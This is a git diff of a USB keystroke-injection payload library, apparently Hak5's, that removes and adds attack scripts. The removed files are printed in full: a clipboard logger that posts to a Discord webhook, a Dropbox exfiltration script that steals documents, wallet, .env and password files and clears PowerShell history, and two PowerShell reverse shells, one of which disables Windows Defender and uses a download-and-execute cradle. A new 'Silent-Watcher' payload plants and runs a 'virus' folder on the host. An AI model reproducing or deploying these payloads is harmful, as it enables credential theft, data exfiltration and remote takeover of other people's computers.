diff --git a/payloads/library/credentials/Duckie-Harvest/sy_cred.ps1 b/payloads/library/credentials/Duckie-Harvest/Duckie-Harvest/sy_cred.ps1
similarity index 100%
rename from payloads/library/credentials/Duckie-Harvest/sy_cred.ps1
rename to payloads/library/credentials/Duckie-Harvest/Duckie-Harvest/sy_cred.ps1
diff --git a/payloads/library/credentials/Funni_Stick_V3/pw.exe b/payloads/library/credentials/Funni_Stick_V3/pw.exe
deleted file mode 100644
index 3cd436064..000000000
Binary files a/payloads/library/credentials/Funni_Stick_V3/pw.exe and /dev/null differ
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1 b/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-Liner.ps1
similarity index 100%
rename from payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1
rename to payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-Liner.ps1
diff --git a/payloads/library/exfiltration/Copy-And-Waste/c.ps1 b/payloads/library/exfiltration/Copy-And-Waste/c.ps1
deleted file mode 100644
index 0215ae3b3..000000000
--- a/payloads/library/exfiltration/Copy-And-Waste/c.ps1
+++ /dev/null
@@ -1,36 +0,0 @@
-Add-Type -AssemblyName WindowsBase
-Add-Type -AssemblyName PresentationCore
-
-function dischat {
-
- [CmdletBinding()]
- param (
- [Parameter (Position=0,Mandatory = $True)]
- [string]$con
- )
-
- $hookUrl = 'YOUR DISCORD WEBHOOK'
-
-$Body = @{
- 'username' = $env:username
- 'content' = $con
-}
-
-
-Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
-
-}
-
-
-dischat (get-clipboard)
-
-while (1){
- $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
- $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
- $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
- $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
-
- if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
- elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
- else {continue}
-}
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Dropbox-Bandit/ex.ps1 b/payloads/library/exfiltration/Dropbox-Bandit/ex.ps1
deleted file mode 100644
index e90ac21fd..000000000
--- a/payloads/library/exfiltration/Dropbox-Bandit/ex.ps1
+++ /dev/null
@@ -1,19 +0,0 @@
-# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)
-$s=$env:USERPROFILE+"\Documents\*";
-# filetypes to exfiltrate
-$fileTypes="*.txt","*wallet*","*.env","*.x*","*.doc*","*pass*","*auth*";
-##############################################################################################
-# Dropbox API values: Follow read.me tutorial to get these! #
-##############################################################################################
-# refresh_token
-$r="REFRESH_TOKEN_HERE";
-# App key
-$u = 'APP_KEY_HERE';
-# App secret
-$p = 'APP_SECRET_HERE';
-# do not touch below this line unless you know what you're doing
-$ds=$env:TMP+"\cpy";$n = 0;$mb = 0;if(Test-Path $ds){rm $ds -Fo -R;}GCI $s -R -I $fileTypes|%{$sz = ((GCI $_.FullName).length/1MB);if($size -lt 100){$mb+=$sz;if($mb -ge 100){$mb = 0;$n++;}ROBOCOPY $_.Directory ("$ds\$n\") $_.Name /MT 128 |Out-Null;}}
-$a=(Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body @{grant_type = "refresh_token";refresh_token = $r;} -Headers @{"Authorization" = "Basic "+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes("${u}:${p}"));"Content-Type" = "application/x-www-form-urlencoded";}).access_token;
-Add-Type -AssemblyName System.IO.Compression.Filesystem;$d=get-date -f MM-dd-yyyy;$t=get-date -f HH-MM-ss;for($i = 0;$i -le $n;$i++){$z="$env:TMP\$env:USERNAME-$i-$t.zip";[System.IO.Compression.ZipFile]::CreateFromDirectory("$ds\$i\",$z,0,$false);
-Invoke-RestMethod https://content.dropboxapi.com/2/files/upload -Method Post -InFile $z -Headers @{"Authorization"="Bearer $a";"Content-Type"="application/octet-stream";"Dropbox-API-Arg"="{`"path`":`"/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip`",`"mode`":`"add`",`"autorename`":true,`"mute`":false}";}|Out-Null;}
-rm $ds -Fo -R;for($i = 0;$i -le $n;$i++){rm "$env:TMP\$env:USERNAME-$i-$t.zip" -Fo;}Clear-History;rm "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\*" -Fo;exit;
\ No newline at end of file
diff --git a/payloads/library/recon/Silent-Watcher/README.md b/payloads/library/recon/Silent-Watcher/README.md
new file mode 100644
index 000000000..cdaf285f0
--- /dev/null
+++ b/payloads/library/recon/Silent-Watcher/README.md
@@ -0,0 +1,27 @@
+# Silent Watcher
+
+This is a combination of a DuckyScript payload and a virus template that I created.
+To use it, compile `payload.txt` and add it to the root directory of your hotplug. BE SURE TO READ THE CODE!
+Some variables are specific to your use case and you may find it in your interest to change the for your purposes.
+This program is designed to work on any machine that operates on Windows 11 and higher.
+
+# How Does It Work?
+
+When the primed hotplug is inserted into the host machine, it will wait for "CAPSLOCK" to toggle on. This is INTENTIONAL, this is intended to be most effective as a waiting game of sorts. The program will then open a powershell window and run `event.ps1` from the virus directory in the hotplug.
+When the `event.ps1` is run, it will listen for any change in the `TEMP` directory of the current user. Once a change is heard, `event.ps1` starts `call.ps1`.
+`call.ps1` will then begin a chain reaction which results in `pull.ps1` being copied into "User\$yourUsername\Documents\virus\Virus" and then run.
+`pull.ps1` then copies the rest of the "virus" directory of the hotplug into the newely created "Virus" directory.
+
+# Tips
+
+You can change this program to most use cases, should there be another directory you would prefer to listen to, change the PATH in `event.ps1` to your desired directory.
+You can also change the timer in the same file to your desired time if you are more patient.
+The copy directory can be changed as well by changing the PATH in both the `call.ps1` and `pull.ps1` scripts
+
+# Disclaimer
+
+I do not take responsibility for any malicious use of this program by others. This is a proof of concept for my own sense of accomplishment, and as such is intended only for educational use. Use this program at your own discretion!
+
+ **The Creator**
+
+ -- Mavis
diff --git a/payloads/library/recon/Silent-Watcher/payload.txt b/payloads/library/recon/Silent-Watcher/payload.txt
new file mode 100644
index 000000000..e69de29bb
diff --git a/payloads/library/recon/Silent-Watcher/virus/call.ps1 b/payloads/library/recon/Silent-Watcher/virus/call.ps1
new file mode 100644
index 000000000..5e9065483
--- /dev/null
+++ b/payloads/library/recon/Silent-Watcher/virus/call.ps1
@@ -0,0 +1,22 @@
+
+$driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE label='DUCKY'").DriveLetter
+$localUsername = $env:USERNAME
+New-Item -Path "C:\Users\$localUsername\Documents" -Name 'virus' -ItemType "directory"
+New-Item -Path "C:\Users\$localUsername\Documents\virus" -Name 'Virus' -ItemType "directory"
+$pullPathBeforeCopy = Get-ChildItem -Path "$driveLetter\virus" -Recurse -Filter "pull.ps1"
+
+$pathBeforeCopy = Get-ChildItem -Path "$driveLetter\" -Directory -Recurse -Filter "virus"
+$pathAfterCopy = "C:\Users\$localUsername\Documents\virus"
+
+Copy-Item -Path $pathBeforeCopy -Destination $pathAfterCopy -Recurse
+Copy-Item -Path $pullPathBeforeCopy -Destination $pathAfterCopy\Virus
+
+$time_in_seconds = 10
+while ($time_in_seconds -gt 0) {
+ #Write-Host "Time remaining: $seconds"
+ Start-Sleep -Seconds 1
+ $time_in_seconds--
+}
+Start-Process powershell -ArgumentList "-File", "$pathAfterCopy\Virus\pull.ps1"
+
+exit
diff --git a/payloads/library/recon/Silent-Watcher/virus/event.ps1 b/payloads/library/recon/Silent-Watcher/virus/event.ps1
new file mode 100644
index 000000000..2dcf2d4f1
--- /dev/null
+++ b/payloads/library/recon/Silent-Watcher/virus/event.ps1
@@ -0,0 +1,58 @@
+$folder = "C:\Users\$env:USERNAME\AppData\Local\Temp\"
+$filter = "*.LOG"
+$Watcher = New-Object IO.FileSystemWatcher $folder, $filter -Property @{
+ IncludeSubdirectories = $false
+ NotifyFilter = [IO.NotifyFilters]'FileName, LastWrite'
+}
+$onCreated = Register-ObjectEvent $Watcher -EventName Created -SourceIdentifier FileCreated -Action {
+ $path = $Event.SourceEventArgs.FullPath
+ $name = $Event.SourceEventArgs.Name
+ $changeType = $Event.SourceEventArgs.ChangeType
+ $timeStamp = $Event.TimeGenerated
+ Write-Host "The file '$name' was $changeType at $timeStamp"
+ Write-Host $path
+ #Move-Item $path -Destination $destination -Force -Verbose
+}
+
+Function Register-Watcher {
+ param ($folder)
+ $filter = "*.*" #all files
+ $watcher = New-Object IO.FileSystemWatcher $folder, $filter -Property @{
+ IncludeSubdirectories = $false
+ EnableRaisingEvents = $true
+ }
+
+ $changeAction = [scriptblock]::Create('
+ # This is the code which will be executed every time a file change is detected
+ $path = $Event.SourceEventArgs.FullPath
+ $name = $Event.SourceEventArgs.Name
+ $changeType = $Event.SourceEventArgs.ChangeType
+ $timeStamp = $Event.TimeGenerated
+ Write-Host "The file $name was $changeType at $timeStamp"
+ Invoke-Expression -Command .\call.ps1
+ if (Test-Path -Path "C:\Users\mason\Documents\virus") {
+ Write-Host "Directory already exists"
+ Get-EventSubscriber -Force | Unregister-Event -Force | exit
+
+ } else {
+ Invoke-Expression -Command .\call.ps1
+ }
+ ')
+
+ Register-ObjectEvent $Watcher -EventName "Changed" -Action $changeAction
+}
+
+ Register-Watcher "$folder"
+ $seconds = 60
+ while ($seconds -gt 0) {
+ Write-Host "Time remaining: $seconds"
+ Start-Sleep -Seconds 1
+ $seconds--
+ }
+Write-Host "Script Finished!"
+
+
+
+Get-EventSubscriber -Force | Unregister-Event -Force
+exit
+
diff --git a/payloads/library/recon/Silent-Watcher/virus/pull.ps1 b/payloads/library/recon/Silent-Watcher/virus/pull.ps1
new file mode 100644
index 000000000..aebf450df
--- /dev/null
+++ b/payloads/library/recon/Silent-Watcher/virus/pull.ps1
@@ -0,0 +1,9 @@
+$localUsername = $env:USERNAME
+$driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE label='DUCKY'").DriveLetter
+$callPathBeforeCopy = Get-ChildItem -Path $driveLetter\virus -Recurse -Filter "call.ps1"
+$callMoveDir = "C:\Users\$localUsername\Documents\virus\Virus\call.ps1"
+$eventPathBeforeCopy = Get-ChildItem -Path $driveletter\virus -Recurse -Filter "event.ps1"
+$eventMoveDir = "C:\Users\$localUsername\Documents\virus\Virus\event.ps1"
+
+Copy-Item -Path $callPathBeforeCopy -Destination $callMoveDir
+Copy-Item -Path $eventPathBeforeCopy -Destination $eventMoveDir
\ No newline at end of file
diff --git a/payloads/library/remote_access/Hidden_access/payload.txt b/payloads/library/remote_access/Hidden_access/payload.txt
deleted file mode 100644
index f40e6bf3f..000000000
--- a/payloads/library/remote_access/Hidden_access/payload.txt
+++ /dev/null
@@ -1,37 +0,0 @@
-REM Author: makozort
-REM Title: Hidden_access
-REM Target: windows 10
-REM Description: gain a reverse shell to targets pc, the script works VERY qucikly agains machines with disabled defender
-REM THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE, I TAKE NO RESPONSIBILITIES FOR ANY MISUSE
-REM This is the rs.ps1 to host
-REM $client = New-Object System.Net.Sockets.TCPClient("{IP here}",{PORT HERE});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
-DELAY 1000
-CTRL ESC
-DELAY 300
-REM this block disables windows defender, delete it if you dont need to. target may have varibles that mean you need to change how many times "TAB" is hit
-STRING windows security
-DELAY 300
-ENTER
-DELAY 1000
-ENTER
-TAB
-TAB
-TAB
-TAB
-DELAY 300
-ENTER
-DELAY 600
-SPACE
-DELAY 600
-LEFT
-ENTER
-DELAY 300
-ALT F4
-GUI r
-DELAY 600
-REM open up powershell in hidden mode, run the command (the rs.ps1 that needs to be edited )you have already uploaded somewhere so that the ducky does not have to type it all out
-STRING powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('LINK HERE');
-ENTER
-DELAY 600
-LEFT
-ENTER
diff --git a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
deleted file mode 100644
index 4cb1e4c38..000000000
--- a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
+++ /dev/null
@@ -1,71 +0,0 @@
-REM ReverseDuckyII
-REM Version 2.0
-REM OS: Windows / Multi
-REM Author: 0i41E
-REM Requirement: DuckyScript 3.0
-
-REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
-REM If inserted into a non Windows machine, the Ducky will appear broken.
-REM DON'T FORGET TO START LISTENER
-
-REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS
-EXTENSION PASSIVE_WINDOWS_DETECT
- REM VERSION 1.0
-
- REM Windows fully passive OS Detection and passive Detect Ready
- REM Includes its own passive detect ready. Does not require
- REM additional extensions
-
- REM USAGE:
- REM Extension runs inline (here)
- REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
- REM boot delay
- REM $_OS will be set to WINDOWS or NOT_WINDOWS
-
- REM CONFIGURATION:
- DEFINE MAX_WAIT 150
- DEFINE CHECK_INTERVAL 20
- DEFINE WINDOWS_HOST_REQUEST_COUNT 2
- DEFINE NOT_WINDOWS 7
-
- VAR $MAX_TRIES = MAX_WAIT
- WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
- DELAY CHECK_INTERVAL
- $MAX_TRIES = ($MAX_TRIES - 1)
- END_WHILE
- IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
- $_OS = WINDOWS
- ELSE
- $_OS = NOT_WINDOWS
- END_IF
-
- REM EXAMPLE USAGE AFTER EXTENSION
- REM IF ($_OS == WINDOWS) THEN
- REM STRING HELLO WINDOWS!
- REM ELSE
- REM STRING HELLO WORLD!
- REM END_IF
-END_EXTENSION
-
-REM Configure your settings below:
-REM Insert the attacking IP between '' & define your port
-DEFINE ATTACKER '192.168.178.25'
-DEFINE PORT 4444
-REM Set the default DELAY
-DEFINE WAIT 500
-
-IF ($_OS == WINDOWS) THEN
- DELAY 1500
- GUI r
- DELAY WAIT
- STRINGLN powershell -NoP -NonI -w h
- DELAY WAIT
- STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit
-REM Capslock light will indicate a finished payload
- CAPSLOCK
-ELSE
-REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF
- ATTACKMODE OFF
-END_IF
-